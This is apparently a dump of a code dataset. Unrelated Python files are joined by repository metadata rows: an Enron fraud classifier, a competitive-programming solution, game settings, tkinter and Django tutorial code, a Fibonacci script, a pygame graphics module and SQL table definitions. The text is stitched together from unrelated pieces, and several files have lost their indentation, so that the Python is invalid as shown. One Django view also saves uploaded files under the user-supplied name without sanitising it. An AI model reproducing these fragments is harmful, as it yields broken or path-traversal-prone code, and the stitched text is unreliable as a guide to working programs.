### Task 1: Select what features you'll use.
### features_list is a list of strings, each of which is a feature name.
### The first feature must be "poi".
features_list = ['poi', 'salary', 'total_payments', 'bonus', 'deferred_income',
'total_stock_value', 'expenses', 'exercised_stock_options', 'other',
'long_term_incentive', 'restricted_stock', 'to_messages',
'from_poi_to_this_person', 'from_messages', 'from_this_person_to_poi',
'shared_receipt_with_poi']
### Load the dictionary containing the dataset
with open("final_project_dataset.pkl", "r") as data_file:
data_dict = pickle.load(data_file)
### Task 2: Remove outliers
import pandas as pd
import numpy as np
df = pd.DataFrame.from_dict(data_dict, orient = 'index')
df = df.replace('NaN', np.nan)
df = df.drop(['TOTAL'])
### Task 3: Create new feature(s)
df['bonus_percent'] = df['salary']/df['total_payments']
df['poi_messages'] = df['from_poi_to_this_person']+df['from_this_person_to_poi']+df['shared_receipt_with_poi']
new_features = ['bonus_percent', 'poi_messages']
### Store to my_dataset for easy export below.
df = df.fillna('NaN')
my_dataset = df.T.to_dict()
### Extract features and labels from dataset for local testing
features_list += new_features
data = featureFormat(my_dataset, features_list, sort_keys = True)
labels, features = targetFeatureSplit(data)
### Task 4: Try a variety of classifiers
### Please name your classifier clf for easy export below.
### Note that if you want to do PCA or other multi-stage operations,
### you'll need to use Pipelines. For more info:
### http://scikit-learn.org/stable/modules/pipeline.html
### Task 5: Tune your classifier to achieve better than .3 precision and recall
### using our testing script. Check the tester.py script in the final project
### folder for details on the evaluation method, especially the test_classifier
### function. Because of the small size of the dataset, the script uses
### stratified shuffle split cross validation. For more info:
### http://scikit-learn.org/stable/modules/generated/sklearn.cross_validation.StratifiedShuffleSplit.html
##### First, import the necessary packages
from sklearn.pipeline import Pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.preprocessing import StandardScaler
from sklearn.feature_selection import SelectKBest
from sklearn.svm import SVC
from sklearn.ensemble import AdaBoostClassifier
from sklearn.neighbors import KNeighborsClassifier
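### A brief illustrative sketch (an addition for clarity, not the submission's own
### tuning code): the stratified shuffle split mentioned in the Task 5 note above
### can be passed explicitly to GridSearchCV through its `cv` argument,
### e.g. GridSearchCV(pipe, cv=sss_cv, param_grid=param_grid, ...);
### the grid searches below simply use cv=3.
from sklearn.model_selection import StratifiedShuffleSplit
sss_cv = StratifiedShuffleSplit(n_splits=10, test_size=0.3, random_state=42)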
def create_tune_svm():
# Creates a pipeline with the SVC, with feature scaling and
# selection, tunes with GridSearchCV and returns the classifier
pipe = Pipeline([
('scaling', StandardScaler()),
('feature_select', SelectKBest()),
('svm', SVC())
])
param_grid = [{
'feature_select__k': [5, 10, 'all'],
'svm__C': [1, 50, 100, 1000],
'svm__gamma': [0.5, 0.1, 0.01],
'svm__kernel': ['linear', 'rbf']
}]
clf = GridSearchCV(pipe, cv=3, n_jobs=1, param_grid=param_grid,
scoring=['precision','recall'], refit='recall').fit(features, labels)
return clf.best_estimator_
def create_tune_ada():
# Creates a pipeline with the adaboost classifier with feature
# selection, tunes with GridSearchCV and returns the classifier
pipe = Pipeline([
('feature_select', SelectKBest()),
('ada', AdaBoostClassifier())
])
param_grid = [{
'feature_select__k': [5, 10, 'all'],
'ada__n_estimators': [30, 50, 100],
'ada__learning_rate': [0.5, 0.8, 1]
}]
clf = GridSearchCV(pipe, cv=3, n_jobs=1, param_grid=param_grid,
scoring=['precision','recall'], refit='recall').fit(features, labels)
return clf.best_estimator_
def create_tune_kneigh():
# Creates a pipeline with the K-nearest neighbors classifier with feature
# selection, tunes with GridSearchCV and returns the classifier
pipe = Pipeline([
('feature_select', SelectKBest()),
('kn', KNeighborsClassifier())
])
param_grid = [{
'feature_select__k': [5, 10, 'all'],
'kn__n_neighbors': [3, 5, 7, 10],
'kn__p': [1, 2]
}]
clf = GridSearchCV(pipe, cv=3, n_jobs=1, param_grid=param_grid,
scoring=['precision','recall'], refit='recall').fit(features, labels)
return clf.best_estimator_
### Task 6: Dump your classifier, dataset, and features_list so anyone can
### check your results. You do not need to change anything below, but make sure
### that the version of poi_id.py that you submit can be run on its own and
### generates the necessary .pkl files for validating your results.
### For the final classifier, I decided not to use the engineered features
### since they do not make the cut in the SelectKBest for the best algorithm.
features_list = ['poi', 'salary', 'total_payments', 'bonus', 'deferred_income',
'total_stock_value', 'expenses', 'exercised_stock_options', 'other',
'long_term_incentive', 'restricted_stock', 'to_messages',
'from_poi_to_this_person', 'from_messages', 'from_this_person_to_poi',
'shared_receipt_with_poi']
data = featureFormat(my_dataset, features_list, sort_keys = True)
labels, features = targetFeatureSplit(data)
clf = Pipeline([
('feature_select', SelectKBest(k = 5)),
('kn', KNeighborsClassifier(n_neighbors = 3, p = 1))
])
dump_classifier_and_data(clf, my_dataset, features_list)
|
[
"noreply@github.com"
] |
kiquin.noreply@github.com
|
435fae641c64ab154adb9a9dbc79b24ff37a76e9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03254/s777543439.py
|
f376be6a40bddef486d5505eef6113f9426e6c02
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 240
|
py
|
N,x = map(int,input().split())
a = sorted(list(map(int,input().split())))
s = [sum(a[:i+1]) for i in range(N)]
if s[-1] == x:
print(N)
exit()
else:
for i in range(N-1):
if s[i] > x:
print(i)
exit()
print(N-1)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
b0b8d6fb1b86beeccf8f4efdab45665d50edf3ee
|
7dcc6d0eb866b3315bf729ec00dfd71db6847ce2
|
/wiserSmartAPI/__init__.py
|
2d1ef8213473d5e86d310c9c1a88e8100a5edee8
|
[
"MIT"
] |
permissive
|
lucguillotin/wiser-smart-api
|
fa6a76ae77595ed03536f4ca224b2fa9e5993e02
|
7648f739e188f426449dbefaf8de502dc0290a17
|
refs/heads/master
| 2022-04-29T13:09:30.067664
| 2020-04-24T20:44:13
| 2020-04-24T20:44:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 25
|
py
|
name = "wiser-smart-api"
|
[
"thomas.fayoux@gmail.com"
] |
thomas.fayoux@gmail.com
|
ae9423398d9515c9300c7a6dccb895c0cea16b93
|
1f84339ba329c2bfaf51b536bf53e386ff2f7f9c
|
/AlienInvasion/settings.py
|
fa40d67ca49baa04e4802565f5b2066b9ee1f069
|
[] |
no_license
|
samar2788/Python_2021
|
d3853cea07259666f343c4bfd882b832eaed98e6
|
df204f8e83a373c8b79e3222c7adbf3e2765549d
|
refs/heads/main
| 2023-05-14T04:50:11.048899
| 2021-06-05T13:17:36
| 2021-06-05T13:17:36
| 369,771,560
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,657
|
py
|
class Settings:
'''A class to store all settings for Alien Invasion.'''
def __init__(self):
'''Initialize the game's static settings.'''
# Screen settings
self.screen_width = 1200
self.screen_height = 800
self.bg_color = (230, 230, 230)
# Ship settings
# self.ship_speed=1.5
self.ship_limit = 3
# Bullet settings
# self.bullet_speed=1.5
self.bullet_width = 3
self.bullet_height = 15
self.bullet_color = (60, 60, 60)
self.bullets_allowed = 3
# Alien settings
# self.alien_speed=1.0
self.fleet_drop_speed = 10
# How quickly the game speeds up
self.speedup_scale = 1.1
# How quickly the alien point values increase
self.score_scale = 1.5
self.initialize_dynamic_settings()
# fleet_direction of 1 represents right and -1 represents left
# self.fleet_direction=1
def initialize_dynamic_settings(self):
'''Initialize settings that change throughout the game '''
self.ship_speed = 1.5
self.bullet_speed = 3.0
self.alien_speed = 1.0
        # Fleet_direction of 1 represents right and -1 represents left
self.fleet_direction = 1
# Scoring
self.alien_points = 50
def increase_speed(self):
'''Increase the speed settings and alien point values'''
self.ship_speed *= self.speedup_scale
self.bullet_speed *= self.speedup_scale
self.alien_speed *= self.speedup_scale
self.alien_points = int(self.alien_points * self.score_scale)
print(self.alien_points)
|
[
"samarbhargava@yahoo.co.in"
] |
samarbhargava@yahoo.co.in
|
2e6fad123df7e365f68f89ed21ca82427560c3f8
|
489270b3d9655e8fa2a36d024db413bcc656c6b7
|
/drop_down_menu.py
|
2e931d4711ab6498fde6f2df8b82084a73cb3c07
|
[] |
no_license
|
pawantilara/Tkinter-programs
|
cc3bd333933ebeeeb1b70a3aaf0f19284ab82ae2
|
2938d2a9dc76b01692328b1460bc6e50df028f59
|
refs/heads/master
| 2020-03-29T02:15:16.700331
| 2019-03-12T09:22:07
| 2019-03-12T09:22:07
| 149,426,946
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,716
|
py
|
from tkinter import *
from tkinter import messagebox
from tkinter import ttk
def quit_app():
root.quit()
def show_about(event=None):
messagebox.showwarning("About","This program is created on 16/16/18")
root=Tk()
the_menu=Menu(root)
file_menu=Menu(the_menu,tearoff=0,bd=2)
file_menu.add_command(label="Open")
file_menu.add_command(label="Save")
file_menu.add_separator()
file_menu.add_command(label="Quit",command=quit_app)
the_menu.add_cascade(label="File",menu=file_menu)
#-------------Font Menu-----------
text_font=StringVar()
text_font.set("Times")
def change_font(event=None):
print("Font picked :",text_font.get())
font_menu=Menu(the_menu,tearoff=0)
font_menu.add_radiobutton(label="Times",variable=text_font
,command=change_font)
font_menu.add_radiobutton(label="Courierr",variable=text_font,
command=change_font)
font_menu.add_radiobutton(label="Arieal",variable=text_font,
command=change_font)
#-------------view Menu-----------
view_menu=Menu(the_menu,tearoff=0)
#root.config(menu=the_menu)
line_numbers=IntVar()
line_numbers.set(1)
view_menu.add_checkbutton(label="Line Numbers",variable=line_numbers)
view_menu.add_cascade(label="Fonts", menu=font_menu)
the_menu.add_cascade(label="View",menu=view_menu)
#-------------Help Menu-----------
help_menu=Menu(the_menu,tearoff=0)
help_menu.add_command(label="About",accelerator="command-A",command=show_about)
the_menu.add_cascade(label="Help",menu=help_menu)
root.bind("<Command-A>",show_about)
root.bind("<Command-a>",show_about)
root.config(menu=the_menu)
root.mainloop()
|
[
"noreply@github.com"
] |
pawantilara.noreply@github.com
|
c58e9db45a8a23e62d361f6e8dbea681148a9a14
|
cc7bbdbb22cb6f7e7916388a5ee8218bc8ffa158
|
/Python3/Django/StudentsDemo/myApp/views.py
|
bdbfe07a86d02fa7d185625413201379ac96e973
|
[
"MIT"
] |
permissive
|
youngqqcn/QBlockChainNotes
|
a816e067642f48a6da38b624663254b4016ec496
|
c9c143eaba6c06e3cee866669ec286e4d3cdbba8
|
refs/heads/master
| 2023-04-03T23:31:05.585545
| 2023-03-30T09:29:07
| 2023-03-30T09:29:07
| 155,657,459
| 37
| 15
|
MIT
| 2023-03-06T23:09:32
| 2018-11-01T03:33:11
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 13,077
|
py
|
from django.shortcuts import render, redirect
# Create your views here.
from django.http import HttpResponse
from .models import Grades, Students, StudentsManager
from django.db.models import Max, Min, Sum, Avg
def index(request):
return HttpResponse("Hello, world. this is index page")
def detail(request, num):
return HttpResponse(f"this is page {num}")
def grades_details(request):
    # fetch the data from the models
grades = Grades.objects.all()
return render(request, "myApp/grades.html", {
"grades" : grades
})
def get_grade_students(request, grade_id : int):
"""
    Show all the students of one grade.
:param request:
:param grade_id:
:return:
"""
grade = Grades.objects.get(id=grade_id)
all_students = grade.students_set.all()
return render(request=request,
template_name="myApp/students.html",
context={
"students" : all_students
})
def students_details(request):
# students = Students.objects.all()
students = Students.stu_not_delete.all()
return render(request=request,
template_name="myApp/students.html" ,
context={
"students" : students
})
def add_default_student(request):
grade = Grades.objects.get(id=1)
    # use the model class
stu = Students.create_student(name='default',
age=999,
gender=False,
contend='this is default',
grade=grade,
is_delete=False)
stu.save()
return HttpResponse(content='added successed')
def add_default_student_use_manager(request):
grade = Grades.objects.get(id=1)
    # use the custom manager
stu = Students.create_student(name='default2',
age=999,
gender=False,
contend='this is default2',
grade=grade,
is_delete=False)
stu.save()
return HttpResponse(content='added successed')
def show_students_page(request, page_index : int):
assert page_index >= 1
page_size = 2
stus = Students.stu_not_delete.all()[(page_index - 1) * page_size : page_index * page_size]
return render(request=request,
template_name="myApp/students.html",
context={
"students" : stus
})
def search_student(request):
    # fuzzy query
# stus = Students.stu_not_delete.filter(sname__contains='t')
    # stus = Students.stu_not_delete.filter(sage__gte=20)  # age greater than or equal to 20
max_age = Students.stu_not_delete.aggregate(Max('sage'))
print(max_age)
stus = []
return render(request=request,
template_name="myApp/students.html",
context={
"students": stus
})
def search_relate(request):
    # related query: find the grades whose students have 'hapy' in their scontend
grades = Grades.objects.filter(students__scontend__contains='hapy')
print(len(grades))
return render(request, "myApp/grades.html", {
"grades": grades
})
from django.db.models import F, Q
def search_student_by_F(request):
grades = Grades.objects.filter(ggirlnum__gt=F("gboynum"))
print(grades)
return HttpResponse(f"found {len(grades)}")
def search_student_by_Q(request):
    # Q(xx) | Q(xxx)  or
    # Q(xx) & Q(xxx)  and
    # ~Q(xxxx)        not
students = Students.stu_not_delete.filter( ~( Q(sgender=False) & Q(sage__lt=30) ) )
return render(request=request,
template_name="myApp/students.html",
context={
"students": students
})
def test_re_path(request):
return HttpResponse("ok")
import json
def request_props(request):
rsp = {
'path': request.path,
'method': request.method,
'encoding': request.encoding,
'GET' : request.GET,
'POST' : request.POST,
'FILES' : request.FILES,
'COOKIES' : request.COOKIES,
'session' : request.session.is_empty(),
'is_ajax' : request.is_ajax()
}
return HttpResponse( json.dumps(rsp) )
def get_url_parameters(request):
rsp = request.GET
return HttpResponse( json.dumps(rsp) )
def get_url_parameters2(request):
# http://127.0.0.1:8000/get2?a=999,444&b=222&c=ccccc
a = request.GET.getlist('a')
print(type(a))
return HttpResponse( json.dumps(a) )
def show_register(request):
return render(request=request, template_name="myApp/register.html")
def register(request):
name = request.POST.get("name")
hobby = request.POST.get("hobby")
gender = request.POST.get("gender")
rsp = {
"name" : name,
"hobby" : hobby,
"gender" : gender,
}
return HttpResponse(json.dumps(rsp))
def show_response(request):
# rsp = HttpResponse(content='xxxxxx')
# rsp.write()
# rsp.set_cookie()
# rsp.get()
# rsp.getvalue()
# rsp.close()
# rsp.serialize()
# rsp.delete_cookie()
# rsp.set_signed_cookie()
return HttpResponse('')
# once a cookie is set, every subsequent request carries it
def set_custom_cookies(request):
rsp = HttpResponse()
rsp.set_cookie("MYCOOKIE", "THIS IS MY COOIKES")
return rsp
from django.http import HttpResponseRedirect
def test_redirect(request):
    # redirect to request_props relative to the current path
    # return HttpResponseRedirect(redirect_to='request_props/')
    # redirect to request_props under the root path
return HttpResponseRedirect(redirect_to='/request_props/')
from django.http import JsonResponse
def json_response(request):
data = {
'name' : 'yqq',
'age' : 10,
'hobby' : 'music'
}
return JsonResponse(data=data)
# path(r'mainpage/', views.show_main_page, name='show_main_page'),
# path(r'user_login/', views.user_login, name='login')
def show_main_page(request):
    # why doesn't the default value take effect????
username = request.session.get('username', default="游客")
if username is None: username = "游客"
return render(request=request,
template_name="myApp/mainpage.html",
context={
'username' : username
})
def show_login_page(request):
return render(request=request,
template_name="myApp/login.html")
# the session_data column of the django_session table holds the username, base64 encoded
def user_login(request):
username = request.POST.get('username')
request.session['username'] =username
    request.session.set_expiry(value=1000)  # session expires after 1000 seconds
return HttpResponseRedirect('/mainpage/')
pass
from django.contrib.auth import login, logout
def user_logout(request):
    # request.session.delete('username')  # does not work
    # logout(request)
    # request.session.clear()  # ok
    # request.session.flush()  # ok
    logout(request)  # recommended
return HttpResponseRedirect('/mainpage/')
def students_counter(request):
stus = Students.stu_all.all()
strtmp = "this is test string"
return render(request=request, template_name="myApp/students_counter.html"
,context={
"students" : stus,
"strtmp" : strtmp
})
def show_reverse_url_page(request):
return render(request=request,
template_name="myApp/reverse_mapping_url.html",
)
def reverse_url_test(request, num : int):
return HttpResponse(content=f"test successed! num is {num}")
def template_externs(request):
return render(request=request, template_name="myApp/sub_page.html")
def html_code(request):
return render(request=request,
template_name="myApp/html_code.html",
context={
'html_rsp' : "<h1>This is html h1!</h1>"
})
def show_test_csrf_page(request):
return render(request=request,
template_name='myApp/csrf_test.html' )
def verifycode(request):
    # import the drawing modules
from PIL import Image, ImageDraw, ImageFont
    # import the random module
import random
    # variables for the background color, width and height of the image
bgcolor = (random.randrange(20, 100), random.randrange(20, 100), random.randrange(20, 100))
width = 100
height = 50
    # create the image object
im = Image.new('RGB', (width, height), bgcolor)
    # create the drawing (pen) object
draw = ImageDraw.Draw(im)
    # draw noise points with the pen's point() function
for i in range(0, 100):
xy = (random.randrange(0, width), random.randrange(0, height))
fill = (random.randrange(0, 255), 255, random.randrange(0, 255))
draw.point(xy, fill=fill)
    # candidate characters for the verification code
characters = '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm'
    # randomly pick 4 characters as the verification code
rand_str = ''
for i in range(0, 4):
rand_str += characters[random.randrange(0, len(characters))]
    # build the font object
font = ImageFont.truetype(r'C:\Windows\Fonts\Arial.ttf', 40)
    # build the font colors
fontcolor1 = (255, random.randrange(0, 255), random.randrange(0, 255))
fontcolor2 = (255, random.randrange(0, 255), random.randrange(0, 255))
fontcolor3 = (255, random.randrange(0, 255), random.randrange(0, 255))
fontcolor4 = (255, random.randrange(0, 255), random.randrange(0, 255))
    # draw the 4 characters
draw.text((5, 2), rand_str[0], font=font, fill=fontcolor1)
draw.text((25, 2), rand_str[1], font=font, fill=fontcolor2)
draw.text((50, 2), rand_str[2], font=font, fill=fontcolor3)
draw.text((75, 2), rand_str[3], font=font, fill=fontcolor4)
    # release the pen
del draw
    # store the code in the session for later verification
request.session['verifycode'] = rand_str
    # in-memory file operations
import io
buf = io.BytesIO()
    # save the image to memory as png
im.save(buf, 'png')
    # return the in-memory image data to the client with MIME type image/png
return HttpResponse(buf.getvalue(), 'image/png')
def verify_code_image(request):
return verifycode(request)
def test_csrf(request):
# print(request.POST)
right_verifycode = request.session.get('verifycode')
user_post_verifycode = request.POST.get('verifycode')
if right_verifycode.upper() != user_post_verifycode.upper():
return redirect(to="/show_test_csrf_page/")
username = request.POST.get("username")
password = request.POST.get("passwd")
return HttpResponse("登录成功!!" + json.dumps(
{
'username' : username,
'password' : password,
}
))
def static_page(request):
return render(request=request,
template_name="myApp/my_static.html")
def upload_file_page(request):
return render(request=request,
template_name="myApp/upload_file.html")
import os
from django.conf import settings
def upload_file(request):
if request.method != 'POST':
return HttpResponse('failed!')
# file = request.FILES["file"]
file = request.FILES.get("file")
file_path = os.path.join( settings.MEDIA_ROOT, file.name)
with open(file_path, 'wb') as outfile:
for block in file.chunks(): #
outfile.write(block)
return HttpResponse("uploaded success!")
from django.core.paginator import Paginator
def student_paginator(request, page_index : int):
students = Students.stu_all.all()
paginator = Paginator( object_list=students, per_page=2 )
one_page_stus = paginator.get_page(number= page_index )
return render(request=request,
template_name="myApp/student_paginator.html",
context={
"students" : one_page_stus
})
def test_ajax(request):
all_stus = Students.stu_all.all()
stus_list = all_stus.values()
print(stus_list)
# print(type(stus_list))
retdata = [ item for item in stus_list ]
return JsonResponse({"data": retdata})
# return JsonResponse({'name' : 'yqq'})
def show_test_ajax_page(request):
return render(request=request,
template_name="myApp/test_ajax.html",
)
def test_mctext(request):
return render(request=request,
template_name='myApp/test_tinymce.html')
#
# # from .task import test_celery_task
# # from .task import
# # import myApp.task
# # from myApp import task
# from .task import TestCeleryTask
# def test_celery(request):
#
# # test_celery_task()
# # res = task.test_celery_task.delay(1, 3)
# # TestCeleryTask.apply_async(args=('gooood', ))
# # print(f'result {res}')
#
# return render(request=request,
# template_name='myApp/test_celery.html')
|
[
"youngqqcn@163.com"
] |
youngqqcn@163.com
|
eeb932461dc3471c7abe683bfa4e33bb5d412efe
|
bb6abd0b31d015e6e843d9bae92dd6650fce9313
|
/FIB.py
|
b41adebd8ef71d84cb4758b4b0d807f29687bb4e
|
[] |
no_license
|
TheNoiy11/2016-Python
|
57c887d587db7bd097531dbc4ba4ab8fbbcaae09
|
dcc2eb65b297498bfcd335accb9510356e8e9976
|
refs/heads/master
| 2021-04-28T23:48:07.801210
| 2016-12-31T05:43:43
| 2016-12-31T05:43:43
| 77,726,886
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 301
|
py
|
def fib(n):
    # build the first n Fibonacci numbers, starting from [0, 1]
    result = [0, 1]
    if n <= 0:
        return []
    elif n <= 2:
        return result[:n]
    else:
        for i in range(1, n - 1):
            result.append(result[i] + result[i - 1])
    return result
while True:
x = int(input("Enter an integer: "))
if x < 0:
break
print()
print(fib(x))
print()
|
[
"noreply@github.com"
] |
TheNoiy11.noreply@github.com
|
4db9fec7ea82de57582b7230e40c34ee46474968
|
b41ccdd8a6bc9f1cb4a0f1fa4776eaaceba9b59b
|
/bansoko/graphics/__init__.py
|
65b27549fde98337c9b8fbad88a36d724c1380f1
|
[
"MIT"
] |
permissive
|
mseyne/bansoko
|
0d75f56cd2d6dcfdfd63a1c7bc28e24e6771a988
|
463a7b5785636ea797d049eb8e4a3d91306d7dc2
|
refs/heads/master
| 2023-02-03T18:06:29.933164
| 2020-12-24T00:44:50
| 2020-12-24T00:44:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,733
|
py
|
"""Module exposing graphic related classes and routines."""
from dataclasses import dataclass
from enum import unique, Enum
from functools import total_ordering
from typing import List, Optional, Tuple, Generator
TILEMAP_WIDTH = 256
TILEMAP_HEIGHT = 256
TILE_SIZE = 8
IMAGE_BANK_WIDTH = 256
IMAGE_BANK_HEIGHT = 256
SCREEN_WIDTH = 256
SCREEN_HEIGHT = 256
@unique
class Direction(Enum):
"""Enumeration representing direction in 2D space.
In addition to int value identifying direction (direction_index) it also stores the
movement vector (dx, dy)
"""
UP = 0, (0, -1)
DOWN = 1, (0, 1)
LEFT = 2, (-1, 0)
RIGHT = 3, (1, 0)
def __init__(self, direction_index: int, delta: Tuple[int, int]) -> None:
self.direction_index = direction_index
self.dx = delta[0]
self.dy = delta[1]
@property
def horizontal(self) -> bool:
"""Value indicating whether the direction is horizontal or not."""
return self in (Direction.LEFT, Direction.RIGHT)
@property
def vertical(self) -> bool:
"""Value indicating whether the direction is vertical or not."""
return self in (Direction.UP, Direction.DOWN)
@classmethod
def num_directions(cls) -> int:
"""Number of all defined directions."""
return len(cls.__members__)
@property
def opposite(self) -> "Direction":
"""The opposite direction to given direction."""
if self == Direction.UP:
return Direction.DOWN
if self == Direction.DOWN:
return Direction.UP
if self == Direction.LEFT:
return Direction.RIGHT
if self == Direction.RIGHT:
return Direction.LEFT
raise Exception(f"Direction {str(self)} is not supported")
@dataclass(frozen=True)
class Point:
"""A point representing a location in (x, y) screen space."""
x: int
y: int
@classmethod
def from_list(cls, coords: List[int]) -> "Point":
"""Create a Point from the list of coordinates."""
return cls(x=coords[0], y=coords[1])
@property
def as_list(self) -> List[int]:
"""Point represented as a list containing [x, y]."""
return [self.x, self.y]
def offset(self, offset: "Point") -> "Point":
"""Create a new Point which is the result of moving this Point by (x, y)."""
return Point(self.x + offset.x, self.y + offset.y)
def move(self, direction: Direction) -> "Point":
"""Create a new Point which is the result of moving this Point in given direction."""
return Point(self.x + direction.dx, self.y + direction.dy)
@total_ordering
@dataclass(frozen=True)
class Size:
"""Size describes width and height dimensions in pixels."""
width: int = 0
height: int = 0
def enlarge(self, dx: int, dy: Optional[int] = None) -> "Size":
"""Create a new Size enlarged by (dx, dy)"""
return Size(self.width + dx, self.height + (dy if dy else dx))
@property
def max_dimension(self) -> int:
"""Maximum dimension (which is either width or height)"""
return max(self.width, self.height)
def can_fit(self, size: "Size") -> bool:
"""Test if given size will fit in this size. Size "fits" in another size only if both width
and height are less or equal to the size the test is performed against to.
"""
return self.width >= size.width and self.height >= size.height
def __lt__(self, other: Tuple[int, ...]) -> bool:
return (self.width, self.height) < (other[0], other[1])
def max_size(size1: Size, size2: Size) -> Size:
"""Create size with maximum width and height of two given sizes."""
return Size(max(size1.width, size2.width), max(size1.height, size2.height))
def min_size(size1: Size, size2: Size) -> Size:
"""Create size with minimum width and height of two given sizes."""
return Size(min(size1.width, size2.width), min(size1.height, size2.height))
SCREEN_RECT = Size(SCREEN_WIDTH, SCREEN_HEIGHT)
@dataclass(frozen=True)
class Rect:
"""A rectangle represented by position and size.
Position and size can be accessed directly. Use left, right, top, bottom the get the
coordinates of rectangle 4 edges.
"""
position: Point
size: Size
@classmethod
def from_coords(cls, x: int, y: int, w: int, h: int) -> "Rect":
"""Create a new Rect with given position (x, y) and size (w, h)"""
return cls(position=Point(x, y), size=Size(w, h))
@classmethod
def from_list(cls, coords: List[int]) -> "Rect":
"""Create a new Rect from the list containing coordinates and size."""
return cls(position=Point(coords[0], coords[1]), size=Size(coords[2], coords[3]))
@classmethod
def from_size(cls, size: Size) -> "Rect":
"""Create a new Rect with given size and positioned at (0, 0)."""
return cls(position=Point(0, 0), size=size)
@property
def as_list(self) -> List[int]:
"""Rect represented as a list containing [x, y, w, h]."""
return [self.position.x, self.position.y, self.size.width, self.size.height]
@property
def x(self) -> int:
"""The x coordinate of the rect."""
return self.position.x
@property
def y(self) -> int:
"""The y coordinate of the rect."""
return self.position.y
@property
def w(self) -> int:
"""The width of the rect."""
return self.size.width
@property
def h(self) -> int:
"""The height of the rect."""
return self.size.height
@property
def left(self) -> int:
"""The position of left edge of the rect."""
return self.x
@property
def right(self) -> int:
"""The position of right edge of the rect."""
return self.x + self.w - 1
@property
def top(self) -> int:
"""The position of top edge of the rect."""
return self.y
@property
def bottom(self) -> int:
"""The position of bottom edge of the rect."""
return self.y + self.h - 1
def offset(self, delta: Point) -> "Rect":
"""Create a new Rect which is the result of moving this Rect by (dx, dy)."""
return Rect(self.position.offset(delta), self.size)
def enlarge(self, w: int, h: int) -> "Rect":
"""Create a new Rect enlarged with given size (w, h)."""
return Rect(position=self.position, size=self.size.enlarge(w, h))
def inside_points(self) -> Generator[Point, None, None]:
"""Generator for iterating over all valid positions inside the rectangle (from top-left to
bottom-right)."""
for y in range(self.y, self.y + self.h):
for x in range(self.x, self.x + self.w):
yield Point(x, y)
def hcenter(width: int, target_x: int, target_width: int = SCREEN_WIDTH) -> int:
"""Center horizontally 'size' with specified width in a target section (described by x and
width)."""
return target_x + (target_width - width) // 2
def vcenter(height: int, target_y: int, target_height: int = SCREEN_HEIGHT) -> int:
"""Center vertically 'size' with specified height in a target section (described by y and
height)."""
return hcenter(height, target_y, target_height)
def center_in_rect(size: Size, target_rect: Rect = Rect.from_size(SCREEN_RECT)) -> Rect:
"""Return rectangle with given size centered in target rectangle."""
x = hcenter(size.width, target_rect.x, target_rect.w)
y = vcenter(size.height, target_rect.y, target_rect.h)
return Rect(Point(x, y), size)
@dataclass(frozen=True)
class Layer:
"""Layer is an abstract surface on which elements can be drawn.
Layers are used when drawing elements that should be put on each other in order to achieve
pseudo 3d effect.
Attributes:
layer_index - index of the layer (used to calculate layer offset)
opaque - is layer opaque *OR* transparent
global_offset - offset of elements drawn on the layer
"""
layer_index: int
opaque: bool = False
global_offset: Point = Point(0, 0)
@property
def offset(self) -> Point:
"""Position offset for all graphical objects drawn on this layer."""
return self.global_offset.offset(Point(-self.layer_index, -self.layer_index))
@property
def transparency_color(self) -> int:
"""Transparency color for the layer."""
return -1 if self.opaque else 0
|
[
"kfurtak1024@gmail.com"
] |
kfurtak1024@gmail.com
|
3bdc5c2b23fa05965fe948f62dc57d22944841e9
|
c7ed386ee16aa762fea8a6e159a498ace4a7b0f8
|
/venv/bin/mailmail
|
ae0f15adba14ae9a8b251927751740bb69864996
|
[] |
no_license
|
Frostpeters/spider
|
264521cbcb4c27de9bde7d2eead585ce53b50f3e
|
81ecb76c18a08dae998b813553bcef5bf8c3695c
|
refs/heads/master
| 2023-01-18T21:01:16.176669
| 2020-08-30T16:13:22
| 2020-08-30T16:13:22
| 284,435,874
| 0
| 0
| null | 2020-08-30T16:13:24
| 2020-08-02T10:05:06
|
Python
|
UTF-8
|
Python
| false
| false
| 268
|
#!/home/frost/PycharmProjects/scrapy_project/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from twisted.mail.scripts.mailmail import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(run())
|
[
"frostpeters101@gmail.com"
] |
frostpeters101@gmail.com
|
|
bdc2849d7e72c4c8e3705ed93b04851cb37cb4ba
|
d33eed067b2b8712312449568821368a057b7a01
|
/Project1/sql_queries.py
|
d59ca66d145ecbea95069ff67d713f909082d12a
|
[] |
no_license
|
sgouda0412/udacityDataEngNanoDeg
|
d61d23f7fedaaf08450caeb3e2af6cb15ac194bb
|
622a7f8e0d0156c79ceb095e842458f0db233c4d
|
refs/heads/master
| 2023-03-21T16:01:33.687589
| 2020-12-08T00:30:57
| 2020-12-08T00:30:57
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,702
|
py
|
# DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays"
user_table_drop = "DROP TABLE IF EXISTS users"
song_table_drop = "DROP TABLE IF EXISTS songs"
artist_table_drop = "DROP TABLE IF EXISTS artists"
time_table_drop = "DROP TABLE IF EXISTS time"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE IF NOT EXISTS songplays(
songplay_id SERIAL PRIMARY KEY,
start_time timestamp REFERENCES time(start_time),
user_id int NOT NULL REFERENCES users(user_id),
level varchar,
song_id varchar REFERENCES songs(song_id),
artist_id varchar REFERENCES artists(artist_id),
session_id int,
location varchar,
user_agent varchar)
""")
